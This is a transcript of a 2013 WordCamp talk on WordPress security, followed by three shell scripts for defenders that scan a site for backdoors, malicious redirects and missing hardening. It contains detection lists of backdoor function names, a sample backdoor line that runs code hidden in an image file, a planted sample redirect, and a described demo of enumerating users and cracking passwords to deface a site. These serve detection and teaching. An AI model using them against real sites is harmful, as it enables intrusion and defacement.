WordPress Security - WordCamp phoenix 2013

18,161 views

WordPress security at WordCamp Phoenix 2013.

  1. WordPress Security: Dealing with Today’s Hacks
  2. If you don’t ask, you don’t get!
     • Dre Armeda, CISSP
     • CEO, Co-Founder at Sucuri Inc.
     • @dremeda
     • Dre.im
     I’m a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I’m infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!
     1/19/2013 Dre Armeda - @dremeda #wcphx
  3. Why listen to me? You don’t have to, but…
     • 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.
       – Managed security awareness for Sempra Energy
       – Deployed security suite for 1-800-Flowers.
       – Cleaned Martha Stewart web properties of malware
     • Not an expert, passionate enthusiast.
     • Seriously though – Quick Sucuri stats:
       – Remediate 200 – 300 infected websites a day, 24/7/365
       – Perform 2 million + malware website scans a month
       – Support all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc…)
     My goal in life is to make the web a safer place!
  4. Thoughts To Kick Things Off
     • Information Security is about risk reduction.
       – If you’re looking for the “silver bullet” this is the wrong talk for you.
     • To think that you will never be infected is like saying you will never be sick.
       – Someone tells you different – Percussion calibration time
     • Prevention is ideal, but not realistic.
       – Risk will never be 0%
       – Detection is key.
  5. Know Your Enemy
     • They have time & resources
     • They are intelligent
     • Attacks are automated
     • Goal is to impact quantity
     • Own one, own them all…
     • It’s not personal
  6. Ok, so what’s the problem? TODAY’S ISSUES:
     • The Ecosystem / Environment
     • Access Control
     • Software Vulnerabilities
     • Administration
     • Credential Management
     • Extensibility
  7. Today’s Focus
     • Ecosystem / Environment
     • Access Control
     • Dealing with Hacks
  8. Logical Architecture (diagram)
     • Linux Operating System
     • Apache (with modules), MySQL, PHP (with modules, PHP-CGI)
     • WordPress
     • Control panels: CPANEL, Plesk, phpMyAdmin
  9. The EcoSystem / Environment
     • Apache – Malicious module injects iFrames
       – http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
     • phpMyAdmin – Mirror Hacked
       – http://sourceforge.net/blog/phpmyadmin-back-door/
     • PHP-CGI – Remote Code Execution
       – http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
     • Plesk – Vulnerable to SQLi attacks
       – http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html
  10. The EcoSystem / Environment
     • What can you do?
       – Not much… completely outside of your control if you’re using a shared or managed host
     • But, you can reduce risk...
       – Use a Dedicated / VPS Environment
         • But recognize the responsibility that this entails; if what I mentioned previously doesn’t make sense, skip to the next step
       – Go with a Managed Host
         • Doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on
  11. Access is Key
     • We have to change the way we treat and think about access. All access – Server / Application
     • We are going through the same mistakes servers and desktops were making in the 90’s with access.
     • Know where you are surfing the web; do you really need to log in as an admin at the coffee shop?
  12. Before We Dive In
  13. WordPress Loving Infections
     • Defacements
     • Backdoors
     • Pharma Hack
     • Injections – iFrame Specifically
     • Malicious Redirects
     • Phishing
  14. Hacktivism at its finest… you now support a cause!?!?! DEFACEMENTS
  15. Defacements
     • Hacktivism 101 – Annoying as S*&T
     • Places to look:
       – Index.html
       – Index.php
         • Root Directory
         • Wp-Content
         • Theme Directory
     • GREP is your friend:
         grep -ri 'sniper399' .
  16. It’s ok to cry a little… BACKDOORS
  17. Backdoors
     • Common terms:
       – is_bot
       – eval
       – base64_decode
       – fopen
       – fclose
       – readfile
       – edoced_46esab (base64_decode reversed)
       – exec
       – system
       – shell_exec
       – gzuncompress
       – popen
       – FilesMan
  18. Erectile Dysfunction pills are leading ads.. Who knew.. PHARMA HACK
  19. Pharma Hack
     • Multi-million $ Business
     • Rarely Distribute Malware
     • Impression based Affiliate Marketing
     • Google’s Search Engine Result Pages (SERP)
     • Odds of malware distribution are actually low
     • Tricks:
       – Embedded within core files
       – Look for “.tmp” directories =>
  20. Pharma Hack, cntd..
     • Try using CURL to emulate Google and Windows:
         curl -L -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://someinfectedwebsite.com
       – Google Webmaster Tools
         • Fetch as Google Bot
     • Check your Theme Index.php file for things like this:
         <?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/my-really-good-theme/images/s.jpg'));$wp__theme_icon(); ?>
  21. Pharma Hack, cntd..
  22. It only hurts for a minute… INJECTIONS
  23. Injections
     • Invisible iFrames – Executing on your browser
     • Contributing to Drive-by-Downloads, Pharma, XSS, CSRF
     • Places to check – Pages that generate content:
       – JS files, Header.php, Index.php, functions.php, Footer.php
  24. Injections, cntd…
     • PHP iFrame Injection =>
       – Count##.php
       – Check all Index.php / Theme JS files
       – Example below:
  25. Injections, cntd…
     • Pharma Link Injections =>
     • Drive-By-Downloads
  26. WTF?!?! Why don’t I understand what it says? MALICIOUS REDIRECTS
  27. Malicious Redirects
     • Redirects your user to a domain distributing malware, fundamentally different than an iframe injection that executes in your browser
     • 8 out of 10 times, check your .htaccess file – all of them:
         # find /var/www -name .htaccess -type f | wc -l
     • Check for backdoors also – often a sign of a bigger issue
  28. Biggest growing problem, exceptionally difficult to detect… PHISHING
  29. Phishing
     • Growing at a faster pace than traditional web-malware
     • No impact to readers, but tied to SPAM bots sending out emails like this:
  30. Phishing, cntd…
  31. Bringing the Point Home: DEMONSTRATION
  32. Demo Objective
     • Use good tools for bad things – wpscan
     • Enumerate the users
     • Enumerate Passwords
     • Own target WordPress site
     • Deface the Website
     I have 5 minutes – Ready?
  33. Remember the risk discussion? KEEPING IT REAL
  34. Update
     • Oldest version found in production – 1.5
     • Leading cause of cross-site contamination issues
     • Perhaps the simplest of tasks, yet we still find this:
  35. Access is Key
     • On the Server:
       – Kill accounts that are not in use
       – FTP is the devil – slap yourself and switch to SFTP
       – Disable password auth & use key pairs
     • WordPress Admin:
       – Multi-Factor Authentication on wp-admin
       – Two-Factor Authentication on wp-login.php
     • Employ least privilege:
       – Only use admin accounts for admin tasks
       – Learn to use Editor, Author, Contributor, Subscriber
  36. Password Dilemma
     • 15 character pass – 3 months to crack
     • Long / Complex / Unique – Key to Passwords
     • Prefer Password Manager – You don’t? ok..
       – Passphrases work too
         • iLuvWCLpHX:2013:S@nT@N b@By
     • Come up with a process & stick to it:
       – One scheme:
         • Remember 8 characters
         • Write Down 8 characters
         • Save 20 characters
       – Second scheme:
         • Remember 20 characters
         • Prefix characters with site name
         • End sequence with some date
  37. Kill PHP Execution
     • Directories:
       – WP-INCLUDES
       – WP-CONTENT
       – UPLOADS
     • At a minimum:
         <Files *.php>
         Deny from all
         </Files>
  38. Disable Theme / Plugin Editor
     I’d take it a step further and remove the ability to install, but that’s just me.
     Modify WP-CONFIG.PHP with:
     • Disable the Plugin / Theme Editor
         define('DISALLOW_FILE_EDIT', true);
       - OR -
     • Disable the Plugin / Theme Update and Installation
         define('DISALLOW_FILE_MODS', true);
  39. Plugins That Help
     Sucuri Clients:
     • Sucuri Security Plugin
     • Theme-Check
     • BackupBuddy
     • Akismet
     Non-Clients:
     • Limit Login Attempts
     • Theme-Check
     • BackupBuddy
     • Akismet
  40. Need a Hand?
     Support Forums:
     • Hacked – http://wordpress.org/tags/hacked
     • Malware – http://wordpress.org/tags/malware
     • BadwareBusters – https://badwarebusters.org
     Online Resources:
     • Sucuri Blog: http://blog.sucuri.net
     • SiteCheck Scanner: http://sitecheck.sucuri.net
     • Unmask Parasites: http://unmaskparasites.com
     • Perishable Press: http://perishablepress.com/category/web-design/security/
     • Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
  41. Dre Armeda, CISSP
     • Dre.im
     • @dremeda
     • Sucuri Inc. – http://sucuri.net – http://blog.sucuri.net – @sucuri_security
     Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.
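Slides 15 and 17 suggest grepping for a defacement tag and for the backdoor function names. The script below is an added example, not part of the deck or of Sucuri's tooling: a POSIX shell triage pass that runs both checks over a constructed sample tree (all paths and sample files are assumptions; the tag sniper399 is the slide's own).

```shell
#!/bin/sh
# Added example (not from the deck): triage a WordPress tree for the backdoor
# indicator terms listed on slide 17 and for a defacement tag as on slide 15.
# The sample tree below is constructed; the tag "sniper399" is the slide's own.

# Slide 17's terms as one extended regex; edoced_46esab is base64_decode reversed.
BACKDOOR_TERMS='is_bot|eval|base64_decode|edoced_46esab|fopen|fclose|readfile|exec|system|shell_exec|gzuncompress|popen|FilesMan'

# Print file:line:text for every PHP file under DIR that uses one of the terms.
# -w keeps "eval" from matching "retrieval"; expect some legitimate hits
# (plugins do call fopen), so review each line rather than deleting blindly.
scan_backdoor_terms() {
    find "$1" -type f -name '*.php' -exec grep -HinwE "$BACKDOOR_TERMS" {} +
}

# List files under DIR containing the defacement tag TAG, i.e. slide 15's
# "grep -ri 'sniper399' ." with -l so it prints one path per hit.
scan_defacement_tag() {
    grep -ril "$2" "$1"
}

# Build a constructed three-file site: a clean theme file, a planted file in
# uploads/ that merely names the suspicious functions, and a defaced index.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/demo" "$d/wp-content/uploads"
    printf '%s\n' '<?php get_header(); ?>' > "$d/wp-content/themes/demo/index.php"
    printf '%s\n' '<?php $fn = array("eval", "base64_decode", "gzuncompress"); // FilesMan' \
        > "$d/wp-content/uploads/.cache.php"
    printf '%s\n' '<html><body>Hacked by sniper399</body></html>' > "$d/index.html"
    echo "$d"
}

# Stand-alone run: build the tree, show both scans, clean up.
site=$(make_sample_tree)
echo "== backdoor terms =="; scan_backdoor_terms "$site"
echo "== defacement tag =="; scan_defacement_tag "$site" sniper399
rm -rf "$site"
```

Point both functions at a real document root instead of the sample tree; the hidden file in uploads/ is the kind of hit that deserves a look first.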
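Slide 27 says to count every .htaccess file under the web root and check each one. This added example (not the deck's or Sucuri's code) does the count and then flags the files whose rewrite or redirect target is an absolute off-site URL; the two sample files and hostnames are constructed.

```shell
#!/bin/sh
# Added example (not from the deck): slide 27's .htaccess sweep, extended to flag
# files whose RewriteRule/Redirect target points off-site. Samples are constructed.

# Constructed web root: the stock WordPress permalink block (on-site rewrites,
# nothing to flag) and a planted file in uploads/ that sends visitors elsewhere.
make_htaccess_samples() {
    d=$(mktemp -d)
    mkdir -p "$d/site/wp-content/uploads"
    cat > "$d/site/.htaccess" <<'EOF'
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
EOF
    # Planted rule (placeholder host): the off-site target is what triage keys on.
    cat > "$d/site/wp-content/uploads/.htaccess" <<'EOF'
RewriteEngine On
RewriteRule .* http://malware-host.invalid/ [R=302,L]
EOF
    echo "$d"
}

# The slide's count, trimmed so it is safe to compare numerically.
count_htaccess() {
    find "$1" -name .htaccess -type f | wc -l | tr -d ' '
}

# Print each .htaccess under DIR with a RewriteRule or Redirect* directive whose
# target is an absolute http(s) URL. Legitimate sites do use such rules, so the
# output is a review list, not a verdict.
flag_offsite_redirects() {
    find "$1" -name .htaccess -type f -exec grep -lE \
        '^[[:space:]]*(RewriteRule|Redirect(Match|Permanent|Temp)?)[[:space:]].*[[:space:]]https?://' {} +
}

# Stand-alone run over the constructed root.
root=$(make_htaccess_samples)
echo "htaccess files: $(count_htaccess "$root")"
echo "off-site redirects:"; flag_offsite_redirects "$root"
rm -rf "$root"
```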
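Slides 37 and 38 give the two hardening settings: a <Files *.php> deny block in wp-includes, wp-content and uploads, and DISALLOW_FILE_EDIT / DISALLOW_FILE_MODS in wp-config.php. The audit below is an added example, not from the deck, that checks a tree for both; the sample site it builds deliberately leaves uploads/ unprotected and sets only the weaker constant. Paths and helper names are assumptions.

```shell
#!/bin/sh
# Added example (not from the deck): audit a WordPress tree for slide 37's
# per-directory PHP execution block and slide 38's wp-config constants.

# Directories slide 37 says should not execute PHP.
NOEXEC_DIRS='wp-includes wp-content wp-content/uploads'

# True if DIR/.htaccess has a <Files *.php> block with the slide's Apache 2.2
# "Deny from all" or the Apache 2.4 "Require all denied". Sites that use
# <FilesMatch> instead need the first pattern widened.
php_exec_blocked() {
    f="$1/.htaccess"
    [ -f "$f" ] && grep -qi '<Files \*\.php>' "$f" \
        && grep -qiE 'Deny from all|Require all denied' "$f"
}

# Print each required directory under ROOT lacking the block; returns 1 if any.
check_php_exec_blocks() {
    missing=0
    for sub in $NOEXEC_DIRS; do
        if ! php_exec_blocked "$1/$sub"; then
            echo "missing PHP execution block: $sub"
            missing=1
        fi
    done
    return $missing
}

# True if CONSTANT is defined true in ROOT/wp-config.php (any quote style/spacing).
wp_const_true() {
    grep -qiE "define\([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)" \
        "$1/wp-config.php"
}

# Constructed site: wp-includes and wp-content are covered, uploads/ (the usual
# drop zone) was forgotten, and only DISALLOW_FILE_EDIT is set.
make_sample_site() {
    d=$(mktemp -d)
    for sub in $NOEXEC_DIRS; do mkdir -p "$d/$sub"; done
    printf '<Files *.php>\nDeny from all\n</Files>\n' > "$d/wp-includes/.htaccess"
    printf '<Files *.php>\nRequire all denied\n</Files>\n' > "$d/wp-content/.htaccess"
    printf "<?php\ndefine('DISALLOW_FILE_EDIT', true);\n" > "$d/wp-config.php"
    echo "$d"
}

# Stand-alone run: report what the sample site is missing.
site=$(make_sample_site)
check_php_exec_blocks "$site" || echo "=> add the slide's <Files *.php> block there"
wp_const_true "$site" DISALLOW_FILE_MODS \
    || echo "DISALLOW_FILE_MODS not set: editor off, but install/update still on"
rm -rf "$site"
```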